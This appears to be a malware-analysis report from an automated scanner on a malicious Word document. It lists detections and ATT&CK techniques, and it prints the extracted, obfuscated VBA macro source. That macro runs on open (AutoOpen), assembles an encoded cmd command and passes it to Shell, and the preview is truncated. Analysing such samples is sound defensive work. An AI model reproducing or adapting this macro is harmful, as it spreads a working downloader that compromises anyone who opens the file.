Verdict: MALICIOUS
Risk Score: 142

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro is designed to execute a command, likely to download and run a second-stage payload. The ClamAV detection and the presence of a legacy WordBasic marker further indicate malicious intent.
Heuristics (5)

- ClamAV: Doc.Malware.Valyria-6752193-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Valyria-6752193-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5792 bytes | f790331859ee4d156c568ea7eac21df0e8e363fa6a6988a8071486d90eec217f |
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "DusqruXGiRh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
AppActivate 342903035
AppActivate UcpRY
AppActivate bcjshB
AppActivate CDbl(ZjPiS)
Shell@ CVar("cm") + HFwcCQPnK + cVKPRTao + VWuoAzvSiR + VmbbjTFLYim + BMRMpufzooz + iaDLjRrA + JNXwwYfYfcNkUP, 184868679 - 184868679
AppActivate Oct(liuwDr * HpAlr)
AppActivate CInt(51)
AppActivate ljBns
End Sub
Attribute VB_Name = "lqwuoNztFoH"
Function VWuoAzvSiR()
On Error Resume Next
AppActivate iwjzuY
AppActivate 31
qHrrYiiSY = "d " + "/V/C" + CStr(Chr(zzdUEvJl + thUGYjnoZ + 34 + rwiNXCH + jDYDozjGb)) + "set " + "pPr=MOAN" + "tGXcfYQDJ" + "ZlJ"
AppActivate CDate(8018)
AppActivate 11
AppActivate KpTSY
oHztLqIqO = "qsHzDVpR" + "-8Ix'" + "$iS{@+vC2o" + "=/(W" + "Fbj" + "dh);gekU" + "naru}" + "P7:E, "
AppActivate CSng(2)
AppActivate Sqr(2007 / lKRMQ - oCEwMo / jfQiS)
AppActivate ChrB(56968 - Ubkaw)
LEZTtph = "wy0." + "\m&&f" + "or " + "%D in " + "(22"
AppActivate mdvmR
AppActivate Round(zMTjz)
iozQNjMDza = ";" + "38;65;51;" + "56;17;4" + "7;51;14" + ";14" + ";64;29" + ";55;21;2" + "1;"
AppActivate 3752
AppActivate Round(97)
oTkFLv = "39" + ";54;51;6" + "5;24" + ";38;44" + ";4" + "5;" + "51;" + "7;4;6" + "4;3;51;4;"
VWuoAzvSiR = qHrrYiiSY + oHztLqIqO + LEZTtph + iozQNjMDza + oTkFLv
AppActivate Log(pqcpjt)
AppActivate nHzTiY
AppActivate 9881
End Function
Function VmbbjTFLYim()
On Error Resume Next
AppActivate Fix(pLwzhO + 17493)
AppActivate ChrB(99577 * rmswv)
KwvcYdLF = "68;4" + "2;51" + ";44;36;14" + ";30;51;54" + ";4;49;2" + "9;15;" + "62" + ";17;39" + ";28;4" + "7;4;4;22" + ";61;40;40" + ";35"
AppActivate diuwRw
AppActivate 950
AppActivate Hex(7)
vlzIkWVtUs = ";46;4" + ";38;" + "50;4;" + "68;54" + ";14;40"
AppActivate Atn(302424527)
AppActivate Fix(tVfWu)
AppActivate Sin(94)
uiBiPnYdJ = ";55;70;66;" + "10;33" + ";47;4;" + "4;22;6" + "1;40;40" + ";35" + ";3"
AppActivate CSng(94)
AppActivate CSng(17129 * 3311 / ujXjsJ + jTlwC)
KiXPKjXjpX = "0" + ";7;30;" + "38;57;17" + ";51;54" + ";4;51;56;" + "22" + ";56;30"
AppActivate Int(32)
AppActivate VwWmBY
AppActivate Cos(470)
wQdwikw = ";1" + "7" + ";51;17" + ";" + "68;7;38;70" + ";40;16;6" + ";53;" + "57;6"
AppActivate LZhETv
AppActivate ChrB(NjQNqa)
ucjqQUMlZ = ";16;3" + "3;47;" + "4" + ";4;22;61;" + "40;40;57" + ";54;7;14;" + "51;44;57;" + "46;17;22" + ";30;"
AppActivate ChrB(wmPdWn)
AppActivate ChrB(YcwYa)
AppActivate 273
nwdKLpmv = "7;51;68;7" + ";3" + "8;70;4" + "0;" + "25;67;46;" + "33;47;4;4" + ";22;" + "61;40;40" + ";" + "35;55;1" + "4;30;57;5" + "4"
AppActivate lOVor
AppActivate AzCXG
PQXuffbKNz = ";55;17;" + "68;7;3" + "8;70;40;" + "5;2" + "5;3" + "6;38;38" + ";2" + "6;33;47;4;"
AppActivate Round(pPDKV)
AppActivate bnRocO
dqGPcmvUvY = "4;2" + "2;61;4" + "0;40;4;" + "47;" + "51;17;"
AppActivate nzuJt
AppActivate Sgn(8)
AppActivate Sgn(4092835)
UZIoPMj = "3" + "0;" + "14;35;" + "51;56;55" + ";70;51" + ";56" + ";30" + ";7;55;54;" + "51;5" + "5;50;14;"
AppActivate CDate(5)
AppActivate Round(nMJmG)
tZhGzfHZ = "51;68;7;" + "38;70;" + "40;4" + ";44;" + "28;" + "68" + ";31;" + "22;14;30;" + "4" + ";41;28" + ";33;"
AppActivate 56374874
AppActivate 793
jUiXSkPVTs = "28;48;49" + ";29;42;6;" + "62;6" + "4;39;6" + "4;28;" + "60;" + "37;60;2" + "8;49;29;" + "23" + ";42" + ";30;3"
AppActivate Log(7)
AppActivate Log(58177 + HOtNIC + 34599 + YqdaD)
AppActivate Chr(69867 * CzoDba + CIUllS - ckzqj)
LCBYkn = "9;29" + ";51;54;" + "35;61;4;5" + "1;70;22;" + "34;28;69;" + "28;34;29;4" + "2;6;62" + ";34;2" + "8;68;51" + ";27" + ";51" + ";28;49;8;" + "38;56;51;5"
VmbbjTFLYim = KwvcYdLF + vlzIkWVtUs + uiBiPnYdJ + KiXPKjXjpX + wQdwikw + ucjqQUMlZ + nwdKLpmv + PQXuffbKNz + dqGPcmvUvY + UZIoPMj + tZhGzfHZ + jU
... (truncated)